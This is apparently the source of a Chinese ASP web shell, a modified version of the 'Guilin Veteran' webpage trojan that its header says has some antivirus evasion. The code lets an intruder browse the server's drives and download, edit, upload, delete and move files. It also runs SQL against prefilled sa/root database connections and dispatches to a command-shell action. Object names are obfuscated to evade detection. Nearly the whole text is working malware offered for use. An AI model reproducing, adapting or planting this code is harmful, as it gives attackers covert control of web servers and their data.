gllb.asp

桂林老兵网页木马修改版,具有一定的免杀功能。that s a

  }
  function DbCheck(){
    if(DbForm.DbStr.value == ""){
	  alert("请先连接数据库");
	  FullDbStr(0);
	  return false;
	}
	return true;
  }
  function FullDbStr(i){
   if(i<0){
     return false;
   }
    Str = new Array(12);  
	Str[0] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=<%=RePath(Session("FolderPath"))%>\\db.mdb";
	Str[1] = "Driver={Sql Server};Server=<%=IP%>,1433;Database=DbName;Uid=sa;Pwd=";
	Str[2] = "Driver={MySql};Server=<%=IP%>;Port=3306;Database=DbName;Uid=root;Pwd=";
	Str[3] = "Dsn=DsnName";
	Str[4] = "SELECT * FROM [TableName] WHERE ID<100";
	Str[5] = "INSERT INTO [TableName](USER,PASS) VALUES(\'aweige\',\'pass\')";
	Str[6] = "DELETE FROM [TableName] WHERE ID=1";
	Str[7] = "UPDATE [TableName] SET USER=\'aweige\' WHERE ID=1";
	Str[8] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";
	Str[9] = "DROP TABLE [TableName]";
	Str[10]= "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";
	Str[11]= "ALTER TABLE [TableName] DROP COLUMN PASS";
	Str[12]= "当只显示一条数据时即可显示字段的全部字节，可用条件控制查询实现.\n超过一条数据只显示字段的前五十个字节。";
	if(i<=3){
	  DbForm.DbStr.value = Str[i];
	  DbForm.SqlStr.value = "";
	  abc.innerHTML="<center>请确认己连接数据库再输入SQL操作命令语句。</center>";
	}else if(i==12){
	  alert(Str[i]);
	}else{
	  DbForm.SqlStr.value = Str[i];
	}
	return true;
  } 
  function FullSqlStr(str,pg){
   if(DbForm.DbStr.value.length<5){
  alert("请检查数据库连接串是否正确!")
  return false;
}
   if(str.length<10){
  alert("请检查SQL语句是否正确!")
  return false;
}
DbForm.SqlStr.value = str ;
DbForm.Page.value = pg;
abc.innerHTML="";
DbForm.submit();
return true;
  }
-->
</script>
</head><body>
<%
Dim T1
Class UPC
  Dim D1,D2
  Public Function Form(F):F=lcase(F):If D1.exists(F) then:Form=D1(F):else:Form="":end if:End Function
  Public Function UA(F):F=lcase(F):If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if:End Function
  Private Sub Class_Initialize
  Dim TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName
    set D1=CreateObject(ObT(3,0)):if Request.TotalBytes<1 then Exit Sub
    set T1 = CreateObject(ObT(5,0)):T1.Type = 1 : T1.Mode =3 : T1.Open
    T1.Write  Request.BinaryRead(Request.TotalBytes):T1.Position=0 : TDa =T1.Read : DStart = 1
    DEnd = LenB(TDa):set D2=CreateObject(ObT(3,0)):vbCrlf = chrB(13) & chrB(10):set T2 = CreateObject(ObT(5,0)):TSt = MidB(TDa,1, InStrB(DStart,TDa,vbCrlf)-1):TLen = LenB (TSt)
    DStart=DStart+TLen+1
    while (DStart + 10) < DEnd
      DIEnd = InStrB(DStart,TDa,vbCrlf & vbCrlf)+3
      T2.Type = 1 : T2.Mode =3 : T2.Open
      T1.Position = DStart
      T1.CopyTo T2,DIEnd-DStart
      T2.Position = 0 : T2.Type = 2 : T2.Charset ="gb2312"
      TIn = T2.ReadText : T2.Close
      DStart = InStrB(DIEnd,TDa,TSt)
      FStart = InStr(22,TIn,"name=""",1)+6
      FEnd = InStr(FStart,TIn,"""",1)
      UpName = lcase(Mid (TIn,FStart,FEnd-FStart))
      if InStr (45,TIn,"filename=""",1) > 0 then
        set TFL=new FIF
        FStart = InStr(FEnd,TIn,"filename=""",1)+10
        FEnd = InStr(FStart,TIn,"""",1)
        FStart = InStr(FEnd,TIn,"Content-Type: ",1)+14
        FEnd = InStr(FStart,TIn,vbCr)
        TFL.FileStart =DIEnd
        TFL.FileSize = DStart -DIEnd -3
        if not D2.Exists(UpName) then
          D2.add UpName,TFL
        end if
      else
        T2.Type =1 : T2.Mode =3 : T2.Open
        T1.Position = DIEnd : T1.CopyTo T2,DStart-DIEnd-3
        T2.Position = 0 : T2.Type = 2
        T2.Charset ="gb2312"
        SFV = T2.ReadText
        T2.Close
        if D1.Exists(UpName) then
          D1(UpName)=D1(UpName)&", "&SFV
        else
          D1.Add UpName,SFV
        end if
      end if
      DStart=DStart+TLen+1
    wend
    TDa=""
    set T2 =nothing
  End Sub
  
  Private Sub Class_Terminate
    if Request.TotalBytes>0 then
      D1.RemoveAll:D2.RemoveAll
      set D1=nothing:set D2=nothing
      T1.Close:set T1 =nothing
    end if
  End Sub
End Class

Class FIF
dim FileSize,FileStart
  Private Sub Class_Initialize
  FileSize = 0
  FileStart= 0
  End Sub
  
  Public function SaveAs(F)
  dim T3
  SaveAs=true
  if trim(F)="" or FileStart=0 then exit function
  set T3=CreateObject(ObT(5,0))
     T3.Mode=3 : T3.Type=1 : T3.Open
     T1.position=FileStart
     T1.copyto T3,FileSize
     T3.SaveToFile F,2
     T3.Close
     set T3=nothing
     SaveAs=false
   end function
End Class

Class LBF
  Dim CF
  Private Sub Class_Initialize
    SET CF=CreateObject(ObT(0,0))
  End Sub
  Private Sub Class_Terminate
    Set CF=Nothing
  End Sub
  function Tran(drv):select case drv:case 0:Tran=Ico("&#61")&"怪盘":case 1:Tran=Ico("&#60")&"软盘":case 2:Tran=Ico("&#59")&"本地硬盘":case 3:Tran=Ico("&#82")&"网络盘":case 4:Tran=Ico("&#62")&"光盘":case 5:Tran="RAM":end select:end function
  Function ShowDriver():For Each D in CF.Drives:S=S&"<tr><td>&nbsp;&nbsp;":S=S&"<a href='javascript:ShowFolder("""&D.DriveLetter&":\\"")'>"&Tran(D.DriveType)& D.DriveLetter&"</a></td></tr>":Next:ShowDriver=S:End Function
  Function FileIco(FName):FileIco="<font face='wingdings' size='5'>2</font> ":End Function
  Function ShowFile(Path):Set FOLD=CF.GetFolder(Path):i=0:S="<table width='100%'  border='0' cellspacing='0' cellpadding='0' bgcolor='#D2EAFF'><tr>":For Each F in FOLD.subfolders:S=S&"<td>"&Ico("0")&" <a href='javascript:ShowFolder("""&RePath(Path&"\"&F.Name)&""")'>"&F.Name&"</a> | <a href='javascript:FullForm("""&Replace(Path&"\"&F.Name,"\","\\")&""",""DelFolder"")'  onclick='return yesok()'>del</a> <a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""CopyFolder"")'  onclick='return yesok()'>copy</a> <a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""MoveFolder"")'  onclick='return yesok()'>move</a>":i=i+1:If i mod 3 = 0 then S=S&"</tr><tr>"
  Next:S=S&"</tr><tr><td height=5></td></tr></table>":Response.Write S : S="":For Each L in Fold.files:S="<table width='100%'  border='0' cellspacing='1' cellpadding='0'><tr onMouseOver=""this.className='tr'"" onMouseOut=""this.className='am'"" class=am><td height='20' width='180'>"&FileIco(L.Name)&"<a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DownFile"");' title=""点击下载"&chr(13)&"文件名: "&L.Name&chr(13)&"大小："&clng(L.size/1024)&"K"&chr(13)&"类型: "&L.type&chr(13)&"属性: "&L.Attributes&chr(13)&"时间："&L.DateLastModified&""">"&L.Name&"</a></td><td width='40' align=""center""><a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""EditFile"")'>edit</a></td><td width='40' align=""center""><a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DelFile"")'  onclick='return yesok()'>del</a></td><td width='40' align=""center""><a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""CopyFile"")'>copy</a></td><td width='40' align=""center""><a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""MoveFile"")'>move</a></td></tr></table>":Response.Write S : S=""
  Next:Set FOLD=Nothing:End function
  
  Function DelFile(Path):If CF.FileExists(Path) Then:CF.DeleteFile Path:S="文件 "&Path&" 删除成功！"&BackUrl:Response.Write S:End If:End Function
  Function EditFile(Path):If Request("Act2")="Post" Then:Set T=CF.CreateTextFile(Path):T.WriteLine Request.form("content"):T.close:Set T=nothing:SI="文件保存成功！":SI=SI&BackUrl:Response.Write SI:Response.End:End If:If Path<>"" Then:Set T=CF.opentextfile(Path, 1, False):Txt=HTMLEncode(T.readall):T.close:Set T=Nothing:Else:Path=Session("FolderPath")&"\newfile.asp":Txt="新建文件":End If:SI="<table width='100%' height='100%'><tr><td valign='top' align='center'>":SI=SI&"<Form action='"&URL&"?Act2=Post' method='post' name='EditForm'>":SI=SI&"<input name='Act' value='EditFile' Type='hidden'>":SI=SI&"<input name='FName' value='"&Path&"' style='width:100%'>":SI=SI&"<textarea name='Content' style='width:100%;height:450'>"&Txt&"</textarea><br>":SI=SI&"<input name='goback' type='button' value='返回' onclick='history.back();'>&nbsp;&nbsp;&nbsp;<input name='reset' type='reset' value='重置'>&nbsp;&nbsp;&nbsp;<input name='submit' type='submit' value='保存'></form>":SI=SI&"</td></tr></table></body></html>":Response.Write SI:End Function  
  Function CopyFile(Path):Path = Split(Path,"||||"):If CF.FileExists(Path(0)) and Path(1)<>"" Then:CF.CopyFile Path(0),Path(1):S="文件"&Path(0)&"复制成功！"&BackUrl:Response.Write S:End If:End Function
  Function MoveFile(Path):Path = Split(Path,"||||"):If CF.FileExists(Path(0)) and Path(1)<>"" Then:CF.MoveFile Path(0),Path(1):S="文件"&Path(0)&"移动成功！"&BackUrl: Response.Write S:End If:End Function
  Function DelFolder(Path):If CF.FolderExists(Path) Then:CF.DeleteFolder Path:S="目录"&Path&"删除成功！"&BackUrl:Response.Write S:End If:End Function:
  Function CopyFolder(Path):Path = Split(Path,"||||"):If CF.FolderExists(Path(0)) and Path(1)<>"" Then:CF.CopyFolder Path(0),Path(1):S="目录"&Path(0)&"复制成功！"&BackUrl:Response.Write S:End If:End Function
  Function MoveFolder(Path):Path = Split(Path,"||||"):If CF.FolderExists(Path(0)) and Path(1)<>"" Then:CF.MoveFolder Path(0),Path(1):S="目录"&Path(0)&"移动成功！"&BackUrl:Response.Write S:End If:End Function
  Function NewFolder(Path):If Not CF.FolderExists(Path) and Path<>"" Then:CF.CreateFolder Path:S="目录"&Path&"新建成功！"&BackUrl:Response.Write S:End If:End Function
End Class
Select Case Act:Case "MainMenu":MainMenu():Case "ShowFile":Set ABC=New LBF:ABC.ShowFile(Session("FolderPath")):Set ABC=Nothing:Case "DownFile":DownFile FName:ShowErr():Case "DelFile":Set ABC=New LBF:ABC.DelFile(FName):Set ABC=Nothing:Case "EditFile":Set ABC=New LBF:ABC.EditFile(FName):Set ABC=Nothing:Case "CopyFile":Set ABC=New LBF:ABC.CopyFile(FName):Set ABC=Nothing:Case "MoveFile":Set ABC=New LBF:ABC.MoveFile(FName):Set ABC=Nothing:Case "DelFolder":Set ABC=New LBF:ABC.DelFolder(FName):Set ABC=Nothing:Case "CopyFolder":Set ABC=New LBF:ABC.CopyFolder(FName):Set ABC=Nothing:Case "MoveFolder":Set ABC=New LBF:ABC.MoveFolder(FName):Set ABC=Nothing:Case "NewFolder":Set ABC=New LBF:ABC.NewFolder(FName):Set ABC=Nothing:Case "UpFile":UpFile():Case "Logout":Session.Contents.Remove("aweige"):Response.Redirect URL:Case "CmdShell":CmdShell():Case "MMD":MMD():Case "CreateMdb":CreateMdb FName:Case "CompactMdb":CompactMdb FName:Case "DbManager":DbManager():Case "ServerInfo":ServerInfo():Case Else MainForm():End Select:ShowErr()
%>
</body></html>